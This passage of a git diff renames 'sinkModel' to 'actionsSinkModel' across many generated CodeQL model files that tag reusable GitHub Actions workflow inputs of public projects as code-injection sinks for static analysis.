a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index feb68c4bdd74..961741f413f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index d3b779c1afa2..985652a265b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 6b0e733be176..3103913ab4f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index cf9971e85246..b89c1307d2d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index b3518a7a8eed..9e60cc61bb56 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index a60fba237ef1..cac4e298538b 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 37f2febb70f3..eb2669a96ead 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 6e3d48dbf89c..590e518d3508 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 465fff41145d..d55af595b1cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 3f091f1c9613..1fd6cd394bcc 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index efa591f749dd..3583052045b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 4bd74701fde7..f355ceee6da2 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 34d11e19946b..2b9190c87af8 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index fb4a82488530..783ff3c04682 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index ef3af44da3a8..de853d30588b 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index a8c86c49d7c0..31f09278ecd3 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 40549844d385..d45a2e2a03a0 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index bd180d9b3676..896400bf2f15 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 1e5721f1e7c5..ade06c90c26b 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index b7a14240aed5..f4c2d488ba37 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 1a276f8812f7..8a11ced42d02 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index ef448c8f4c0d..4c018b20f223 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 6c6721700258..315c85efeb62 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index b7104a8b6153..8a3132d52582 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index cd81a7239066..9a669c8c009a 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 1b2ce37480f5..0ecb817822c0 100644 
--- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 91889927c452..e4590eeec8b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 8d4400bd3ead..ea0ddad06978 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml 
@@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 29c7e1bd3e24..9352f766e82d 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 109dce9df0db..d436644f4acd 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index e3643f0156b2..c6c01abca904 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index a4bba59b5a5c..8a9f76e7e52d 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index d12982c35a45..8b3cfebc67b9 100644 
--- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index deb10e5e4b4f..9add4859f35a 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5c22f0ffcb76..efc8097b963f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 790e94c2aacd..6a305522cfb4 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index fedb21393bc3..441325c76a5f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index f60fffb206e2..5f0831afc073 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index c7fe932aba20..afd7aabc1fce 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index d47aea3363f3..49e556f585f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index f32acf5038ef..24585aa50ed0 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml 
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"]
 - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
index c739b5750ccb..afc7af28f9b4 100644
--- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"]
 - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
index 7ac3c0fb530e..5b3d91a8a7ba 100644
--- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"]
 - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
index c641035f9662..b43253eb619a 100644
--- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
